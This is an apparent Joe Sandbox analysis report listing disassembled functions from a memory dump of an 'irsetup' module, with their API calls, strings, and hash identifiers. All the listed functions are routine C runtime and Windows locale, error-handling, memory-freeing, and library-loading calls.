_errno.LIBCMT ref: 000000018002065F

Strings

@, xrefs: 00000001800206A2

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID: @
API String ID: 2310398763-2766056989
Opcode ID: 65e2a0e65b8682a92b97ad27ec68b60d0671ab9fbfa8d204ae279d19c13defa3
Instruction ID: 6cf7d81aec9c8a7fb52b555c26e3c1199c8c24d09ef78c42bdf52907f5b2ca1f
Opcode Fuzzy Hash: 65e2a0e65b8682a92b97ad27ec68b60d0671ab9fbfa8d204ae279d19c13defa3
Instruction Fuzzy Hash: 21512432B1474D45FBFB8A3898557EE2390679C7D4F34C225BA5A866C2DF38C6198B00

Function 0000000180037058 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 00000001800370B3
GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 00000001800370F5
GetACP.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 0000000180037118

Strings

OCP, xrefs: 0000000180037091
ACP, xrefs: 0000000180037081

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 285159c17e2accfc9b13dbfaf6de1df71dd8840a5528aefbbd73939a99c6a5a6
Instruction ID: 31aaffd01f1e8c00c037cc1d3137d0b0bd3712a38feaaca81b6232ad461d006d
Opcode Fuzzy Hash: 285159c17e2accfc9b13dbfaf6de1df71dd8840a5528aefbbd73939a99c6a5a6
Instruction Fuzzy Hash: 22214271300A49D5FAB7DB21E9803EB6390B74C7C8F46C521AA4D47666EF28C74DC700

Function 0000000180026EEC Relevance: 7.7, APIs: 5, Instructions: 233COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180026F0F

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180026F52
__tzset.LIBCMT ref: 0000000180026F6F
_isindst.LIBCMT ref: 0000000180027018

Part of subcall function 0000000180026BD4: _errno.LIBCMT ref: 0000000180026BF6

_isindst.LIBCMT ref: 000000018002706C

Part of subcall function 00000001800351E8: _lock.LIBCMT ref: 00000001800351F6

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_isindst$DecodePointer__tzset_lock
String ID:
API String ID: 2552603377-0
Opcode ID: 94332f3981986e09bb0910da463cacfcd71f2233cd8271649ea0427451d2a9fc
Instruction ID: a068425ec057d83c032eccabfb2bcb394e40b10ab35c283d6b764921ba1d8b95
Opcode Fuzzy Hash: 94332f3981986e09bb0910da463cacfcd71f2233cd8271649ea0427451d2a9fc
Instruction Fuzzy Hash: B691F9B271074947EF9BDF29D55179A6792E7987C5F04C03AFA098A796EF38C6088B00

Function 00000001800223CC Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800223FE

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180022436

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 9d55c2a6a59a82965daf0e8e646d10d15f0e768c763823f1f9afd29687c29db6
Instruction ID: f5c319ab33e0a8075ae33812c2a92c3b1c48c1f7b9d2e96434c6b2da3a56c658
Opcode Fuzzy Hash: 9d55c2a6a59a82965daf0e8e646d10d15f0e768c763823f1f9afd29687c29db6
Instruction Fuzzy Hash: D641F472A00A5892F7B7DF65E8017AE3390A7897E4F60C312BA7547AC5CE78C6498B40

Function 000000018001EBFC Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018001EC2B

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018001EC5E

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 56bfbcb23a128c196e49c81069df4a7ee18435d57266e18776e5003e9f0183c1
Instruction ID: 904b913cc3ec980953253aa1da5105bbdd00c7158b6d19c9bc06cc26936a1786
Opcode Fuzzy Hash: 56bfbcb23a128c196e49c81069df4a7ee18435d57266e18776e5003e9f0183c1
Instruction Fuzzy Hash: EF319372714BD985FBA7AB71AC0279E6291B78D7C0F10C526BA4A87B85DF3CC6098701

Function 0000000180021B88 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180021BBA

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180021BED

Strings

@, xrefs: 0000000180021C1D

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID: @
API String ID: 2310398763-2766056989
Opcode ID: e305e226cf207c6d3f1dd86a634ac54eddaa51f416a3df2b113854f6797ccea9
Instruction ID: dd94d8077e03ae22ffc14675778569cb5697c2bb140d0af9ff915d2123f11729
Opcode Fuzzy Hash: e305e226cf207c6d3f1dd86a634ac54eddaa51f416a3df2b113854f6797ccea9
Instruction Fuzzy Hash: 06412C72710A4D45FBA7CB36AC513FA635167A97E8F74C216BE29876D5DF38C2098300

Function 00000001800372F8 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 000000018003731F
GetLocaleInfoA.KERNEL32 ref: 0000000180037354
GetLocaleInfoA.KERNEL32 ref: 00000001800373AC
GetLocaleInfoA.KERNEL32 ref: 00000001800374A0

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale$_getptd
String ID:
API String ID: 1743167714-0
Opcode ID: b4030c375111dc87c7a81313f96055d9207103059a3c94d77078ed0d4a0bec02
Instruction ID: 9853df9228a634b84d650e4cd0a57f6a8145f4ab692f0d1b0a1c4647dd7ef205
Opcode Fuzzy Hash: b4030c375111dc87c7a81313f96055d9207103059a3c94d77078ed0d4a0bec02
Instruction Fuzzy Hash: 5F614E72300A8897DBBF9A65D9443DE73A1F38C789F51811AE75D87791CF38E6688700

Function 0000000180010AB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000000180010AD2
FormatMessageA.KERNEL32 ref: 0000000180010B02

Strings

system error %d, xrefs: 0000000180010B1B

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID: system error %d
API String ID: 3479602957-1688351658
Opcode ID: 0b669dc38d1b02e4621c60ae251cc2d9fe0382d15873282476e5f311bfdc800a
Instruction ID: 5165d0e7630ab715d2080139ec972a0a1eb7dfbc78c08bfca532b6b1035b4b33
Opcode Fuzzy Hash: 0b669dc38d1b02e4621c60ae251cc2d9fe0382d15873282476e5f311bfdc800a
Instruction Fuzzy Hash: 56011A31304A8882E7B29B55F49179AB2A0FB8D7C4F558125AA8907755DF79C6488B40

Function 000000018003758C Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00000001800375AE
GetLocaleInfoA.KERNEL32 ref: 00000001800375E3

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale_getptd
String ID:
API String ID: 3731964398-0
Opcode ID: ed92aab74e24e1c157c9003b9606fb17f54fc7dbdfdefb113adb3dab755d3dc2
Instruction ID: 14398583cd06948a384385bef8cd944388f3e303429900c163158203f3a44866
Opcode Fuzzy Hash: ed92aab74e24e1c157c9003b9606fb17f54fc7dbdfdefb113adb3dab755d3dc2
Instruction Fuzzy Hash: 87218032300A8896EBBB9B25D9553DBB3A0F78C789F418125E75D87396DF38D668C700

Function 000000018003715C Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 0000000180037183
GetLocaleInfoA.KERNEL32 ref: 00000001800371B8

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale_getptd
String ID:
API String ID: 3731964398-0
Opcode ID: 3c3da7c936a9a1d7d7928e9dc572b502ff7468b01418821e0a10ab2f620c66c2
Instruction ID: a232d29d29e465a5efbbe9cce7ee2381c15c0905e4f694560ebf159723a5cdbb
Opcode Fuzzy Hash: 3c3da7c936a9a1d7d7928e9dc572b502ff7468b01418821e0a10ab2f620c66c2
Instruction Fuzzy Hash: A9219D32300A8896EB6BDB64E8853DA73A0F38CB88F458126EA5D87755CF38D659C740

Function 0000000180037244 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 0000000180037285

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6db5ba4383936ebe8e135fc20a07d54cabfd9c019b671f35b81fbb6f7a59b079
Instruction ID: 1779db9e300c3f0be7c9e9f2cf91417e77d66518fa8146c6749ef4c91204d209
Opcode Fuzzy Hash: 6db5ba4383936ebe8e135fc20a07d54cabfd9c019b671f35b81fbb6f7a59b079
Instruction Fuzzy Hash: D911543231468D89EBB35765E4903EB6390A39D7CCF558532FA8D46286CE28C64E8710

Function 000000018003769C Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(?,?,00000140,000000018003786E,?,?,?,?,00000000,0000000180028F80), ref: 00000001800376EC

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: a772892202ddaf5bc622bbe73f4b19016f8f684e91aec17a0921c547e3cf381a
Instruction ID: f37fcbef81f8ea48d901cc4db84f161ea8b218e8b27c5afce3cbb95621750e1d
Opcode Fuzzy Hash: a772892202ddaf5bc622bbe73f4b19016f8f684e91aec17a0921c547e3cf381a
Instruction Fuzzy Hash: B8115E767046088BFBAB9B31C4563EB23A1F358B8DF158815E60D46287CB78C6A98781

Function 0000000180037730 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(?,?,00000140,0000000180037836,?,?,?,?,00000000,0000000180028F80), ref: 0000000180037765

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 00904e545afd1d8bcc4d25644970bc411eaa74f4fe036e873c08ffc18f5239ee
Instruction ID: 536939a62cb50f1254b4d1823daa1212530eac2b623dc0f81497a316b2726411
Opcode Fuzzy Hash: 00904e545afd1d8bcc4d25644970bc411eaa74f4fe036e873c08ffc18f5239ee
Instruction Fuzzy Hash: CAF0AF76704A4C8AF7AB8B31C4563EB27D1A398B88F19C015EA0D422D7DE78C6998741

Function 000000018003A528 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

GetLocaleInfoW.KERNEL32 ref: 000000018003A558

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale_getptd
String ID:
API String ID: 3731964398-0
Opcode ID: 30b74f351a9049185b5c7b206bcb158cb25f0595aff4ca38198320f560619d19
Instruction ID: e8c26664117332e88b1dd3b4d098a9168b36064e77387e33d55b75928aa8ea7e
Opcode Fuzzy Hash: 30b74f351a9049185b5c7b206bcb158cb25f0595aff4ca38198320f560619d19
Instruction Fuzzy Hash: AAF05432614A8482D7518B15E44439AA760F7C8BE0F588210FB9D57B69CE28C9568B40

Function 000000018003D408 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000018003D430

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ff4c1dfb36b85c262c150c417b3b8a7bb35bc48b0e0c663feccef2f2a2400bd6
Instruction ID: 54e8e65f8259819ee4ef56e8d4dbd3fa1e1d9d900539162f45c44271054f6398
Opcode Fuzzy Hash: ff4c1dfb36b85c262c150c417b3b8a7bb35bc48b0e0c663feccef2f2a2400bd6
Instruction Fuzzy Hash: 3CE06575218A8881F773D710E8013DB3750B79D7D8F814207F58C466A5DE3CC3598B00

Function 0000000180036164 Relevance: 53.8, APIs: 43, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 0000000180036179

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

free.LIBCMT ref: 0000000180036182
free.LIBCMT ref: 000000018003618B
free.LIBCMT ref: 0000000180036194
free.LIBCMT ref: 000000018003619D
free.LIBCMT ref: 00000001800361A6
free.LIBCMT ref: 00000001800361AE
free.LIBCMT ref: 00000001800361B7
free.LIBCMT ref: 00000001800361C0
free.LIBCMT ref: 00000001800361C9
free.LIBCMT ref: 00000001800361D2
free.LIBCMT ref: 00000001800361DB
free.LIBCMT ref: 00000001800361E4
free.LIBCMT ref: 00000001800361ED
free.LIBCMT ref: 00000001800361F6
free.LIBCMT ref: 00000001800361FF
free.LIBCMT ref: 000000018003620B
free.LIBCMT ref: 0000000180036217
free.LIBCMT ref: 0000000180036223
free.LIBCMT ref: 000000018003622F
free.LIBCMT ref: 000000018003623B
free.LIBCMT ref: 0000000180036247
free.LIBCMT ref: 0000000180036253
free.LIBCMT ref: 000000018003625F
free.LIBCMT ref: 000000018003626B
free.LIBCMT ref: 0000000180036277
free.LIBCMT ref: 0000000180036283
free.LIBCMT ref: 000000018003628F
free.LIBCMT ref: 000000018003629B
free.LIBCMT ref: 00000001800362A7
free.LIBCMT ref: 00000001800362B3
free.LIBCMT ref: 00000001800362BF
free.LIBCMT ref: 00000001800362CB
free.LIBCMT ref: 00000001800362D7
free.LIBCMT ref: 00000001800362E3
free.LIBCMT ref: 00000001800362EF
free.LIBCMT ref: 00000001800362FB
free.LIBCMT ref: 0000000180036307
free.LIBCMT ref: 0000000180036313
free.LIBCMT ref: 000000018003631F
free.LIBCMT ref: 000000018003632B
free.LIBCMT ref: 0000000180036337
free.LIBCMT ref: 0000000180036343

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: 2f2d5588e97d756e9a577e36f27ed1f0fafce1ce69f8890a1f8447804ed0654a
Instruction ID: 03925525cb8416a551a9b4b4029cb5bf65b7929adb151452348da2fa71f7cf51
Opcode Fuzzy Hash: 2f2d5588e97d756e9a577e36f27ed1f0fafce1ce69f8890a1f8447804ed0654a
Instruction Fuzzy Hash: 7F416532611E4881EBA6AB75C4513FC2321ABC8BC4F048132F95D9B7A7CE10CB598354

Function 000000018003A1F8 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 130libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A235
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A251
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A279
EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A282
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A298
EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2A1
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2B7
EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2C0
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2DE
EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2E7
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A319
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A328
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A380
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A3A0
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A3B9

Strings

GetActiveWindow, xrefs: 000000018003A268
GetProcessWindowStation, xrefs: 000000018003A2D4
GetLastActivePopup, xrefs: 000000018003A287
GetUserObjectInformationA, xrefs: 000000018003A2A6
MessageBoxA, xrefs: 000000018003A247
USER32.DLL, xrefs: 000000018003A22E

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3085332118-232180764
Opcode ID: 8f431ba8dc0e35966c13d23202dae3974de4cf8e8649169e699a89669a8de12d
Instruction ID: dfefc03f7fba11b39094b96e9353418926974b70fd291aca694570e016384653
Opcode Fuzzy Hash: 8f431ba8dc0e35966c13d23202dae3974de4cf8e8649169e699a89669a8de12d
Instruction Fuzzy Hash: 6E513E31606B0880FDE7DB56BC957EA23906B4EBC4F4A8425BD4D037A2EE78C74D8354

Function 000000018002B1B8 Relevance: 30.5, APIs: 20, Instructions: 485COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018002B1EB
_errno.LIBCMT ref: 000000018002B1F4
__doserrno.LIBCMT ref: 000000018002B24E
_errno.LIBCMT ref: 000000018002B255

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
